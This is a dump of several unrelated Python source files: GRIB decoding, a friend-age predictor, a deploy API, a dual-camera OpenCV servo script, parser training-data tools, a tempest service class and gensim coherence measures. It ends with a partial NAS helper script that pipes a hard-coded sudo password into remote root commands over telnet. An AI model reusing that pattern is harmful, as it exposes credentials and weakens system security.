namespace)\n\n # Different types of keys can be skipped\n if skipkeys:\n if 'computed' in skipkeys:\n ecc.codes_skip_computed(iterid)\n if 'coded' in skipkeys:\n ecc.codes_skip_coded(iterid)\n if 'edition' in skipkeys:\n ecc.codes_skip_edition_specific(iterid)\n if 'duplicates' in skipkeys:\n ecc.codes_skip_duplicates(iterid)\n if 'read_only' in skipkeys:\n ecc.codes_skip_read_only(iterid)\n if 'function' in skipkeys: \n ecc.codes_skip_function(iterid)\n \n data = OrderedDict()\n \n # iterate over message keys\n while ecc.codes_keys_iterator_next(iterid):\n\n\n keyname = ecc.codes_keys_iterator_get_name(iterid)\n #print(keyname)\n\n\n #print(\"Size:\", ecc.codes_get_size(gid, keyname))\n #print(\"Values:\", ecc.codes_get_values(gid, keyname))\n #print(\"Array:\", ecc.codes_get_values(gid, keyname))\n\n # try to get key values,\n # use get_array for sizes > 1 and get for sizes == 1\n if ecc.codes_get_size(gid,keyname) > 1:\n #print(\"has array\", type is str)\n #print(type is not )\n if ecc.codes_get_native_type(iterid, keyname) is not str:\n keyval = ecc.codes_get_array(gid, keyname, None)\n else:\n keyval = ecc.codes_get(gid, keyname, None)\n #print(\"Arr:\", keyval)\n else:\n # Todo: fix reading mybits\n if keyname not in ['mybits']:\n keyval = ecc.codes_get(gid, keyname, None)\n #print(\"Val:\", keyval)\n else:\n keyval = 'err'\n\n # add keyname-keyvalue-pair to output dictionary\n data[keyname] = keyval\n\n #print('Message processed')\n # release iterator\n ecc.codes_keys_iterator_delete(iterid)\n\n return data\n\nif __name__ == '__main__':\n print('miub: Calling module as main...')","sub_path":"miub_eccodes.py","file_name":"miub_eccodes.py","file_ext":"py","file_size_in_byte":8650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"348557806","text":"import datetime as dt\nfrom statistics import median\nfrom typing import Optional\n\nfrom api import get_friends\n\n\ndef age_predict(user_id: int) -> Optional[float]:\n \"\"\" Наивный прогноз возраста по возрасту друзей\n Возраст считается как медиана среди возраста всех друзей пользователя\n :param user_id: идентификатор пользователя\n :return: медианный возраст пользователя\n \"\"\"\n assert isinstance(user_id, int), \"user_id must be positive integer\"\n assert user_id > 0, \"user_id must be positive integer\"\n\n friends = get_friends(user_id, 'bdate')\n if friends is None:\n return -1\n\n today = dt.datetime.now()\n ages = []\n\n for friend in friends:\n try:\n day, month, year = map(int, friend['bdate'].split('.'))\n bdate = dt.datetime(year, month, day)\n ages.append((today - bdate).days // 365)\n except:\n pass\n return median(ages)\n\n\nif __name__ == \"__main__\":\n print(age_predict(141602985))\n","sub_path":"homework05/age.py","file_name":"age.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"292468338","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n walle-web\n\n :copyright: © 2015-2017 walle-web.io\n :created time: 2017-03-25 11:15:01\n :author: wushuiyong@walle-web.io\n\"\"\"\n\nfrom flask import request, abort,current_app\nfrom walle.api.api import SecurityResource\nfrom walle.model.record import RecordModel\nfrom walle.model.task import TaskModel\nfrom walle.service.deployer import Deployer\n\n\nclass DeployAPI(SecurityResource):\n def get(self, task_id=None):\n \"\"\"\n fetch deploy list or one item\n /deploy/\n\n :return:\n \"\"\"\n super(DeployAPI, self).get()\n\n def put(self,task_id):\n \"\"\"\n update deploy\n /deploy/\n \"\"\"\n try:\n current_app.logger.info('-----------start a deploy with gitlab runner--------------')\n current_app.logger.info(task_id)\n task_info = TaskModel(id=task_id).item()\n wi = Deployer(task_id=task_id, console=False, api_trigger=True)\n deploy_status = False\n if task_info['is_rollback']:\n deploy_status = wi.walle_rollback()\n else:\n deploy_status = wi.walle_deploy()\n current_app.logger.info('-----------end deploy with gitlab runner--------------')\n\n return self.render_json(data=deploy_status)\n except Exception as e:\n current_app.logger.info(e)\n return self.render_error(code=2001, message='发布失败')\n \n ","sub_path":"walle/api/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"285424404","text":"import cv2 as cv\nimport numpy as np\nimport time\nfrom adafruit_servokit import ServoKit\n\nprint(cv.__version__)\n\ntimeMark = time.time() # 时间标记\ndtFIL = 0 # 低通滤波,表示时间变化\n\nwidth = 640 # 800 640 1280 1920\nheight = 480 # 600 480 720 1080\nflip = 2 # 设置翻转\n\nfont = cv.FONT_HERSHEY_SIMPLEX # 设置字体\n\nkit = ServoKit(channels=16) # 视频驱动通道有16个\n\ntilt = 90 # 倾斜角度\npan = 90 # 水平角度\n\ndTilt = 10 # 移动刻度\ndPan = 1 # 移动刻度\n\nkit.servo[0].angle = pan # 水平舵机-cam1\nkit.servo[1].angle = tilt # 倾斜舵机-cam1\nkit.servo[2].angle = pan # 水平舵机-cam2\nkit.servo[3].angle = tilt # 倾斜舵机-cam2\n\n# G streamer 是从摄像机源到显示器源的通道\n\n# 树莓派摄像头捕获,用!隔开命令;\n# flip-method=2正常,flip-method=0表示反转图像\n# wbmode表示白平衡模式,通过gst-inspect-1.0 nvarguscamerasrc命令查看\n# tnr为temporal noise reduction时间噪声降低\n# tnr-mode表示时间噪声降低模式,通过gst-inspect-1.0 nvarguscamerasrc命令查看\n# tnr-strength表示时间降噪强度,通过gst-inspect-1.0 nvarguscamerasrc命令查看\n# ee-mode表示边缘模式,通过gst-inspect-1.0 nvarguscamerasrc命令查看\n# ee-strength表示边缘增强强度,通过gst-inspect-1.0 nvarguscamerasrc命令查看\n# videobalance表示视频平衡, contrast表示对比度,通过gst-inspect-1.0 videobalance命令查看\n# brightness表示亮度,通过gst-inspect-1.0 videobalance命令查看\n# saturation表示饱和度,,通过gst-inspect-1.0 videobalance命令查看\n# camSet = 'nvarguscamerasrc sensor-id=0 ! video/x-raw(memory:NVMM), width=3264, height=2464, framerate=21/1, format=NV12 ! nvvidconv flip-method=‘+str(flip)+’ ! video/x-raw, width='+str(width)+', height='+str(height)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink' \n\n# drop=True 可以消除延迟\ncamSet1 = 'nvarguscamerasrc sensor-id=0 ee-mode=2 ee-strength=0 tnr-mode=3 tnr-strength=1 wbmode=3 ! video/x-raw(memory:NVMM), width=3264, height=2464, framerate=21/1, format=NV12 ! nvvidconv flip-method=‘+str(flip)+’ ! video/x-raw, width='+str(width)+', height='+str(height)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! videobalance contrast=1.5 brightness=-.15 saturation=1.2 ! appsink drop=True' \ncamSet2 = 'nvarguscamerasrc sensor-id=1 ee-mode=2 ee-strength=0 tnr-mode=3 tnr-strength=1 wbmode=3 ! video/x-raw(memory:NVMM), width=3264, height=2464, framerate=21/1, format=NV12 ! nvvidconv flip-method=‘+str(flip)+’ ! video/x-raw, width='+str(width)+', height='+str(height)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! videobalance contrast=1.5 brightness=-.15 saturation=1.2 ! appsink drop=True' \n\ncam1 = cv.VideoCapture(camSet1)\ncam2 = cv.VideoCapture(camSet2)\n# USB摄像头捕获\n# 方法一\n# cam3 = cv.VideoCapture('/dev/video0') \n# 方法二,没成功运行\n# camSet = 'v4l2src device=/dev/video0 ! video/x-raw, width='+str(width)+', height='+str(height)+', framerate=25/1 ! videoconvert ! appsink'\n# cam = cv.VideoCapture(camSet)\n\nwhile True:\n _, frame1 = cam1.read()\n _, frame2 = cam2.read()\n\n frame3 = np.hstack((frame1, frame2)) # 组合框架1和2\n dt = time.time() - timeMark # 时间种子\n timeMark = time.time() # 新的时间标记\n dtFIL = .9*dtFIL + .1*dt # 低通滤波\n fps = 1 / dtFIL # 每秒帧数\n cv.rectangle(frame3, (0,0), (150,40), (0,0,255), -1) # 在左上角画一个实心红色矩形,蓝 绿 红\n cv.putText(frame3, 'fps: '+str(round(fps,1)), (0,30), font, 1, (0,255,255), 2) # 插入帧数文本,保留一位小数,字体1号,黄色,2个字体沉重感\n\n print(\"fps = \", fps)\n\n # cv.imshow('myCam1', frame1) # 在窗口显示图像1,自适应图像尺寸。\n # cv.imshow('myCam2', frame2) # 在窗口显示图像2,自适应图像尺寸。\n cv.imshow('comboCam', frame3) # 显示组合后图像\n\n # cv.moveWindow('myCam1', 0, 0) # 窗口坐标,左上角\n # cv.moveWindow('myCam2', 0, 500) # 窗口坐标,下移500\n cv.moveWindow('comboCam', 0, 0) # 窗口坐标,左上角\n\n kit.servo[0].angle = pan # 水平舵机-cam1\n kit.servo[2].angle = pan # 水平舵机-cam2\n pan = pan + dPan\n if pan >= 179 or pan <= 1:\n dPan = dPan * (-1)\n kit.servo[1].angle = tilt # 倾斜舵机-cam1 \n kit.servo[3].angle = tilt # 倾斜舵机-cam2\n tilt = tilt + dTilt # 实现类似扫描功能,先水平,侯倾斜\n if tilt >= 169 or tilt <= 11:\n dTilt = dTilt * (-1)\n\n\n if cv.waitKey(1) == ord('q'): # 键盘绑定函数\n break\ncam.release()\ncv.destroyAllWindows() # 破坏创建的所有窗口\n","sub_path":"learn_jetson/OpenCV/OpenCV-4-dualCams.py","file_name":"OpenCV-4-dualCams.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"302938904","text":"import os\nfrom zipfile import ZipFile\n\nimport torch.utils.data\nfrom nltk.tree import Tree\n\nfrom algebras.algebra import Algebra\nfrom algebras.algebra import FreeTreeAlgebra\nfrom data_structures import int_trees as intree\nfrom interning import interning_tools\nfrom interning.interning_tools import Interner\nfrom interning.number_assignments import CountNumberAssignment\nfrom srsystem.srsystem import NoArityTopDownSRProblem\nfrom srsystem.srsystem import SRProblem\n\n\nclass ZipFileDataset(torch.utils.data.Dataset):\n \"\"\"\n Implements random access over examples from a Zipfile, this is then used for data loading with the pyTorch data\n management tools.\n \"\"\"\n\n def __init__(self, file, decoder):\n if isinstance(file, str):\n self.file = ZipFile(file, \"r\")\n else:\n self.file = file\n\n self.entries = self.file.namelist()\n self.decoder = decoder\n\n def close(self):\n self.file.close()\n\n def __getitem__(self, item):\n outer_list = []\n inner_list = []\n name = self.entries[item]\n lines = self.file.read(name).decode().strip().splitlines()\n\n for line in lines:\n inner_list.append(line.strip())\n if len(inner_list) > 2 and inner_list[-1] == \"\" and inner_list[-2] == \"\":\n outer_list.append(self.decoder(inner_list[:len(inner_list) - 2]))\n inner_list = []\n while len(inner_list) > 1:\n if inner_list[-1] == \"\":\n inner_list = inner_list[:len(inner_list) - 1]\n else:\n outer_list.append(self.decoder(inner_list))\n inner_list = []\n\n return outer_list\n\n def __len__(self):\n return len(self.entries)\n\n\ndef make_training_set(filename, algebra, is_stop):\n \"\"\"\n This creates a training set iterable from the files in the given file (path to a zipfile), assuming that operations\n will be taken from the given algebra and with is_stop indicating whether we are creating a stopping or choice\n training set.\n\n :param filename:\n :param algebra:\n :param is_stop:\n :return:\n \"\"\"\n\n if is_stop:\n decoder = lambda x: SRProblem.decode_stopping(x)\n else:\n decoder = lambda x: SRProblem.decode_choice(x)\n\n return ZipFileDataset(filename, decoder)\n\n\ndef make_data_iterator(configuration, filename, algebra, is_stop, shuffle):\n \"\"\"\n Creates a torch.DataLoader for the data in the named file. is_stop indicates whether we are creating a stopping or\n a choice training set.\n\n :param configuration: the parameters here are:\n batch_size -- the number of files in the zip that will be opened per for each batch\n num_loading_threads -- how many threads to use for loading more than 0 leads to an error right now\n :param filename:\n :param algebra:\n :param is_stop:\n :param shuffle:\n :return:\n \"\"\"\n\n batch_size = configuration[\"batch_size\"]\n workers = configuration[\"num_loading_threads\"]\n\n training_set = make_training_set(filename, algebra, is_stop)\n return torch.utils.data.DataLoader(dataset=training_set, shuffle=shuffle, batch_size=batch_size,\n num_workers=workers, collate_fn=collate)\n\n\ndef collate(x):\n result = []\n\n for sublist in x:\n for item in sublist:\n result.append(item)\n\n return result\n\n\ndef make_corpus(sentence_iterable):\n \"\"\"\n Reads in a corpus from the given iterable assume that every item returned by the iterable is a string that\n conforms to the nltk format for trees. Returns the corpus as an iterable of nltk.tree.Tree\n\n :param sentence_iterable:\n :return:\n \"\"\"\n corpus = []\n for line in sentence_iterable:\n corpus.append(Tree.fromstring(line))\n\n return corpus\n\n\ndef training_set_from_trees(count_cutoff: int, corpus, interner_file, algebra_file,\n choice_training_file, stop_training_file):\n \"\"\"\n This method returns a word interner and an algebra, it also writes both, as well as a training set into the given\n files.\n\n :param count_cutoff:\n :param corpus:\n :param interner_file:\n :param algebra_file:\n :param choice_training_file:\n :param stop_training_file:\n :return:\n \"\"\"\n word_count = {}\n for (i, tree) in enumerate(corpus):\n # here we count how often certain leaf nodes occur so we can enforce the count cut-offs\n count_leafs(tree, word_count)\n\n # some reporting to see progress\n if (i + 1) % 10 == 0:\n print(\n \"Processed instance number: \" + str(i + 1) + \" out of \" + str(len(corpus)) + \"instances. For counting \"\n \"occurrences.\")\n\n # now we create an interner based on the counts we observed\n word_interner = interning_tools.Interner(CountNumberAssignment(cut_off=count_cutoff, counts=word_count))\n node_set = set()\n\n for (i, tree) in enumerate(corpus):\n # now we add all the words and the nodes in order to then go on to create training examples\n add_entries(tree, node_set, word_interner)\n if (i + 1) % 10 == 0:\n print(\"Processed instance number: \" + str(i + 1) + \" out of \" + str(\n len(corpus)) + \" instances. For lexicon creation\")\n\n # now we create an algebra with the seen nodes\n algebra = FreeTreeAlgebra(word_interner, node_set)\n\n # time to write out the interners and the algebra\n interner_file.write(repr(word_interner))\n algebra_file.write(repr(algebra.action_interner))\n\n # now we create the training set\n create_training_instances(choice_training_file, corpus, stop_training_file, word_interner, algebra)\n\n # we return the interner and algebra in case calling methods want to use them to create further training sets\n return word_interner, algebra\n\n\nclass FakeWriteAble:\n \"\"\"\n This class is used to collect multiple write commands into a single string. The written strings are separated by\n 3 linesep\n \"\"\"\n\n def __init__(self):\n self.lines = []\n\n def get_string(self, reverse=True):\n return os.linesep.join(reversed(self.lines) if reverse else self.lines)\n\n def write(self, content):\n self.lines.append(content)\n\n\ndef create_training_instances(choice_training_file, corpus, stop_training_file, word_interner, algebra):\n \"\"\"\n This method iterates through the given corpus and adds all the training examples from it to the choice and stop\n training files via write operations. All examples from a singe tree are bunched into a single write operations.\n\n :param choice_training_file:\n :param corpus:\n :param stop_training_file:\n :param word_interner:\n :param algebra:\n :return:\n \"\"\"\n for i, tree in enumerate(corpus):\n # we go over trees and numbers, the numbers are used to keep track of progress\n\n # the fake writeable is intended to collect all the examples we create while processing a single tree\n st = FakeWriteAble()\n ch = FakeWriteAble()\n\n # first we need to obtain the actual words that we need to parse, encoded as ints\n words = intree.get_leafs(tree, word_interner)\n\n # now we create an instance of the problem in order to get representations of the different training steps\n # SYSTEM SPECIFIC\n system = NoArityTopDownSRProblem(words, word_interner, algebra)\n\n # this method actually goes through the nodes to add the different actions\n insert(tree, system, algebra, word_interner, ch, st)\n\n # there si always a stopping decision after we are done with the tree\n instance = system.encode_stopping(algebra, True)\n SRProblem.write_stopping(instance, st)\n\n choice_training_file.write(ch.get_string())\n stop_training_file.write(st.get_string())\n\n if (i + 1) % 10 == 0:\n print(\"Processed instance number: \" + str(i + 1) + \" out of \" + str(\n len(corpus)) + \" instances. For creating training\"\n \" data.\")\n\n\ndef insert(tree: Tree, system: SRProblem, alg: Algebra, interner: Interner,\n choice_training, stop_training):\n if system.is_final():\n instance = system.encode_stopping(alg, False)\n SRProblem.write_stopping(instance, stop_training)\n\n options = system.get_options()\n index = -1\n\n option = None\n\n if len(tree) < 1:\n index = options.index(alg.shift)\n option = alg.shift\n else:\n for option in options:\n index += 1\n if repr(option) == tree.label().strip():\n break\n\n instance = system.encode_choice(alg, options, index)\n SRProblem.write_choice(instance, choice_training)\n system.apply_operation(option)\n\n for child in tree:\n insert(child, system, alg, interner, choice_training, stop_training)\n\n if len(tree) > 0:\n options = system.get_options()\n index = -1\n for option in options:\n index += 1\n if str(option).strip() == \"Reduce\":\n break\n\n instance = system.encode_choice(alg, options, index)\n SRProblem.write_choice(instance, choice_training)\n system.apply_operation(option)\n\n\ndef add_entries(tree: Tree, node_set: set, word_interner: interning_tools.Interner):\n if len(tree) < 1:\n word_interner(tree.label())\n else:\n node_set.add(tree.label())\n for child in tree:\n add_entries(child, node_set, word_interner)\n\n\ndef count_leafs(tree: Tree, word_count: dict):\n if len(tree) == 0:\n label = tree.label()\n word_count[label] = word_count.get(label, 0) + 1\n else:\n for child in tree:\n count_leafs(child, word_count)\n\n\ndef extract_training_set(training_sentences: list, gold_operation_sequences: list,\n system_type, algebra: Algebra, interner: Interner, converter,\n include_stopping=True):\n choice_training = []\n stop_training = []\n\n for i in range(len(training_sentences)):\n problem = system_type(training_sentences[i], interner, algebra)\n gold = gold_operation_sequences[i]\n\n for op in gold:\n # handle finality training\n if problem.is_final() and include_stopping:\n stop_training.append(converter.encode_stopping(algebra, problem, False))\n\n choices = problem.get_options()\n pick = None\n for j in range(len(choices)):\n if str(choices[j]) == str(op):\n pick = j\n break\n\n choice_training.append(converter.encode_choice(algebra, problem, choices, pick))\n problem.apply_operation(op)\n\n if include_stopping:\n stop_training.append(converter.encode_stopping(algebra, problem, True))\n\n return choice_training, stop_training\n\n\ndef postorder(tree, map_to_op, overall: list):\n for child in tree.children:\n postorder(child, map_to_op, overall)\n overall.append(map_to_op(tree.node_label))\n\n\ndef preorder(tree, map_to_op, overall: list):\n overall.append(map_to_op(tree.node_label))\n for child in tree.children:\n postorder(child, map_to_op, overall)\n\n\ndef get_operations(trees, map_to_op, order=postorder):\n op_lists = []\n\n for tree in trees:\n overall = []\n order(tree, map_to_op, overall)\n op_lists.append(overall)\n\n return op_lists\n","sub_path":"learning/supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":11507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"52536785","text":"# Copyright 2013 Red Hat, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport json\nimport re\nimport urllib3\n\nfrom six.moves import urllib\n\nfrom config_tempest.constants import LOG\nMULTIPLE_SLASH = re.compile(r'/+')\n\n\nclass ServiceError(Exception):\n pass\n\n\nclass Service(object):\n def __init__(self, name, service_url, token, disable_ssl_validation,\n client=None):\n self.name = name\n self.service_url = service_url\n self.headers = {'Accept': 'application/json', 'X-Auth-Token': token}\n self.disable_ssl_validation = disable_ssl_validation\n self.client = client\n\n self.extensions = []\n self.versions = []\n\n def do_get(self, url, top_level=False, top_level_path=\"\"):\n parts = list(urllib.parse.urlparse(url))\n # 2 is the path offset\n if top_level:\n parts[2] = '/' + top_level_path\n\n parts[2] = MULTIPLE_SLASH.sub('/', parts[2])\n url = urllib.parse.urlunparse(parts)\n\n try:\n if self.disable_ssl_validation:\n urllib3.disable_warnings()\n http = urllib3.PoolManager(cert_reqs='CERT_NONE')\n else:\n http = urllib3.PoolManager()\n r = http.request('GET', url, headers=self.headers)\n except Exception as e:\n LOG.error(\"Request on service '%s' with url '%s' failed\",\n (self.name, url))\n raise e\n if r.status >= 400:\n raise ServiceError(\"Request on service '%s' with url '%s' failed\"\n \" with code %d\" % (self.name, url, r.status))\n return r.data\n\n def set_extensions(self):\n self.extensions = []\n\n def set_versions(self):\n self.versions = []\n\n def get_extensions(self):\n return self.extensions\n\n @staticmethod\n def get_service_name():\n \"\"\"Return the service name.\n\n This return a list because you can have different services for the\n same type, like volume, volumev2, volumev3\n \"\"\"\n return []\n\n def get_versions(self):\n \"\"\"Return the versions available for each service.\n\n This doesn't means tempestconf support all these versions. Only that\n the service have these api versions enabled.\n \"\"\"\n return self.versions\n\n def set_default_tempest_options(self, conf):\n pass\n\n def get_supported_versions(self):\n \"\"\"Return the versions supported by tempestconf.\n\n The server might have older or newer versions that could not be\n supported by tempestconf.\n \"\"\"\n return []\n\n def get_catalog(self):\n \"\"\"Return the catalog name of a service.\n\n Usually the catalog has the same name of the service, in some cases\n this is not true, like in volume, that we have volumev3 and volumev2\n for example.\n \"\"\"\n return self.name\n\n def get_feature_name(self):\n \"\"\"Return the name of service used in -feature-enabled.\n\n Some services have the -feature-enabled option in tempest, that\n diverges from the service name. The main example is object-store\n service where the -feature-enabled is object-storage.\n \"\"\"\n return self.name\n\n def get_service_extension_key(self):\n \"\"\"Return the extension key for a particular service\"\"\"\n return None\n\n def get_unversioned_service_name(self):\n \"\"\"Return name of service without versions.\n\n Some services are versioned like volumev2 and volumev3, we try to\n discover these services checking the supported versions, so we need\n to know the unversioned service name for this.\n The default value is the name of the service.\n \"\"\"\n return self.name\n\n\nclass VersionedService(Service):\n def set_versions(self, top_level=True):\n body = self.do_get(self.service_url, top_level=top_level)\n body = json.loads(body)\n self.versions = self.deserialize_versions(body)\n\n def deserialize_versions(self, body):\n versions = []\n for version in body['versions']:\n if version['status'] != \"DEPRECATED\":\n versions.append(version)\n return list(map(lambda x: x['id'], versions))\n\n def no_port_cut_url(self):\n # if there is no port defined, cut the url from version to the end\n u = urllib3.util.parse_url(self.service_url)\n url = self.service_url\n if u.port is None:\n found = re.findall(r'v\\d', url)\n if len(found) > 0:\n index = url.index(found[0])\n url = self.service_url[:index]\n return (url, u.port is not None)\n","sub_path":"config_tempest/services/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"611177003","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2013 Radim Rehurek \n# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html\n\n\"\"\"\nThis module contains functions to compute direct confirmation on a pair of words or word subsets.\n\"\"\"\n\nimport logging\n\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\nEPSILON = 1e-12 # Should be small. Value as suggested in paper.\n\n\ndef log_conditional_probability(segmented_topics, accumulator, with_std=False, with_support=False):\n \"\"\"\n This function calculates the log-conditional-probability measure\n which is used by coherence measures such as U_mass.\n This is defined as: m_lc(S_i) = log[(P(W', W*) + e) / P(W*)]\n\n Args:\n segmented_topics (list): Output from the segmentation module of the segmented\n topics. Is a list of list of tuples.\n accumulator: word occurrence accumulator from probability_estimation.\n with_std (bool): True to also include standard deviation across topic segment\n sets in addition to the mean coherence for each topic; default is False.\n with_support (bool): True to also include support across topic segments. The\n support is defined as the number of pairwise similarity comparisons were\n used to compute the overall topic coherence.\n\n Returns:\n list : of log conditional probability measure for each topic.\n \"\"\"\n topic_coherences = []\n num_docs = float(accumulator.num_docs)\n for s_i in segmented_topics:\n segment_sims = []\n for w_prime, w_star in s_i:\n try:\n w_star_count = accumulator[w_star]\n co_occur_count = accumulator[w_prime, w_star]\n m_lc_i = np.log(((co_occur_count / num_docs) + EPSILON) / (w_star_count / num_docs))\n except KeyError:\n m_lc_i = 0.0\n\n segment_sims.append(m_lc_i)\n\n topic_coherences.append(aggregate_segment_sims(segment_sims, with_std, with_support))\n\n return topic_coherences\n\n\ndef aggregate_segment_sims(segment_sims, with_std, with_support):\n \"\"\"Compute various statistics from the segment similarities generated via\n set pairwise comparisons of top-N word lists for a single topic.\n\n Args:\n segment_sims (iterable): floating point similarity values to aggregate.\n with_std (bool): Set to True to include standard deviation.\n with_support (bool): Set to True to include number of elements in `segment_sims`\n as a statistic in the results returned.\n\n Returns:\n tuple: with (mean[, std[, support]])\n \"\"\"\n mean = np.mean(segment_sims)\n stats = [mean]\n if with_std:\n stats.append(np.std(segment_sims))\n if with_support:\n stats.append(len(segment_sims))\n\n return stats[0] if len(stats) == 1 else tuple(stats)\n\n\ndef log_ratio_measure(\n segmented_topics, accumulator, normalize=False, with_std=False, with_support=False):\n \"\"\"\n If normalize=False:\n Popularly known as PMI.\n This function calculates the log-ratio-measure which is used by\n coherence measures such as c_v.\n This is defined as: m_lr(S_i) = log[(P(W', W*) + e) / (P(W') * P(W*))]\n\n If normalize=True:\n This function calculates the normalized-log-ratio-measure, popularly knowns as\n NPMI which is used by coherence measures such as c_v.\n This is defined as: m_nlr(S_i) = m_lr(S_i) / -log[P(W', W*) + e]\n\n Args:\n segmented_topics (list): Output from the segmentation module of the segmented\n topics. Is a list of list of tuples.\n accumulator: word occurrence accumulator from probability_estimation.\n with_std (bool): True to also include standard deviation across topic segment\n sets in addition to the mean coherence for each topic; default is False.\n with_support (bool): True to also include support across topic segments. The\n support is defined as the number of pairwise similarity comparisons were\n used to compute the overall topic coherence.\n\n Returns:\n list : of log ratio measure for each topic.\n \"\"\"\n topic_coherences = []\n num_docs = float(accumulator.num_docs)\n for s_i in segmented_topics:\n segment_sims = []\n for w_prime, w_star in s_i:\n w_prime_count = accumulator[w_prime]\n w_star_count = accumulator[w_star]\n co_occur_count = accumulator[w_prime, w_star]\n\n if normalize:\n # For normalized log ratio measure\n numerator = log_ratio_measure([[(w_prime, w_star)]], accumulator)[0]\n co_doc_prob = co_occur_count / num_docs\n m_lr_i = numerator / (-np.log(co_doc_prob + EPSILON))\n else:\n # For log ratio measure without normalization\n numerator = (co_occur_count / num_docs) + EPSILON\n denominator = (w_prime_count / num_docs) * (w_star_count / num_docs)\n m_lr_i = np.log(numerator / denominator)\n\n segment_sims.append(m_lr_i)\n\n topic_coherences.append(aggregate_segment_sims(segment_sims, with_std, with_support))\n\n return topic_coherences\n","sub_path":"home--tommy--mypy/mypy/lib/python2.7/site-packages/gensim/topic_coherence/direct_confirmation_measure.py","file_name":"direct_confirmation_measure.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"194877726","text":"import pandas as pd\nimport argschema as ags\nimport drcme.tsne as tsne\nimport sklearn.semi_supervised as sm\nimport numpy as np\n\nclass ComboTsneParameters(ags.ArgSchema):\n spca_file_1 = ags.fields.InputFile()\n labels_file = ags.fields.InputFile()\n output_file = ags.fields.OutputFile()\n n_neighbours = ags.fields.Integer(default=80)\n gamma = ags.fields.Float(default=25)\n n_iter = ags.fields.Integer(default=20000)\n\n\ndef main(spca_file_1, labels_file, output_file,\n n_neighbours, gamma, n_iter, **kwargs):\n df_1 = pd.read_csv(spca_file_1, index_col=0).to_numpy()\n y_gt = pd.read_csv(labels_file, index_col=0).to_numpy().ravel()\n df_1 = df_1[:len(y_gt)]\n output_df = pd.DataFrame()\n print('Data loaded...')\n print('Spreading labels')\n prop = sm.LabelSpreading(kernel='knn', n_neighbors=n_neighbours, gamma=gamma, alpha=0.5, max_iter=n_iter, n_jobs=-1)\n prop.fit(df_1, y_gt)\n output = prop.transduction_.reshape(-1,1) \n output_prob = prop.predict_proba(df_1)\n output_dist = prop.label_distributions_\n output_pred = prop.predict(df_1).reshape(-1,1)\n np.savetxt(output_file, np.hstack((output,output_prob,output_dist, output_pred)), delimiter=',')\n\n\nif __name__ == \"__main__\":\n module = ags.ArgSchemaParser(schema_type=ComboTsneParameters)\n main(**module.args)\n","sub_path":"drcme/bin/run_label_prop_on_spca.py","file_name":"run_label_prop_on_spca.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"173220833","text":"import bencode\nimport fsys\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport telnet\nimport time\nimport torrent\nimport torrentcheck\nfrom tempfile import gettempdir\n\nif os.environ.get('HOSTNAME') != 'a1':\n import gui_copy\n import tm\n\n\ndef get_local_name(fn):\n if fn[:4] == '/b6/' or fn == '/b6':\n return 'a1', fn\n if fn[:4] == '/b7/' or fn == '/b7':\n return 'a1', fn\n if fn[:4] == '/b8/' or fn == '/b8':\n return 'a1', fn\n if fn[:4] == '/b9/' or fn == '/b9':\n return 'a1', fn\n if fn[:13] == '/home/yc/a4a/':\n return 'a4', '/aa/' + fn[13:]\n if fn[:13] == '/home/yc/a4d/':\n return 'a4', '/home/yc/dn/' + fn[13:]\n if fn == '/aa' or fn.startswith('/aa/'):\n return 'a4', fn\n if fn == '/home/yc/dn' or fn.startswith('/home/yc/dn/'):\n return 'a4', fn\n return 'a3', fn\n\n\ndef sudo_python(text, pfn):\n srv, lfn = get_local_name(pfn)\n with open(pfn, 'w', encoding='utf8') as f:\n f.write(text)\n telnet.telnet_nas(srv, 'echo \"1234\" | sudo -S python3 {}'.format(lfn))\n\n\ndef lock(fn):\n print('', fn)\n srv, _ = get_local_name(fn)\n if srv == 'a1':\n telnet.py(srv, 'import fsys\\nfsys.deepRemoveWrite({})', fn)\n else:\n telnet.sudoPy(srv, 'import fsys\\nfsys.deepAddImmu({})', fn)\n\n\ndef unlock(fn):\n print('', fn)\n srv, _ = get_local_name(fn)\n if srv == 'a1':\n telnet.py(srv, 'import fsys\\nfsys.deepAddWrite({})', fn)\n else:\n telnet.sudoPy(srv, 'import fsys\\nfsys.deepRemoveImmu({})', fn)\n\n\ndef move_to_top(fn):\n n = os.path.basename(fn)\n for x in ['/b6/','/b7/','/b8/','/b9/'\n '/home/yc/a4a/','/home/yc/a4d/',\n '/a3/','/b1/','/b5/',\n '/']:\n if fn.startswith(x):\n newfn = x + n\n os.rename(fn, newfn)\n return newfn \n\n\ndef print_disk_size():\n print('dn1-{} a3-{} b1-{} b2-{} 4a-{} 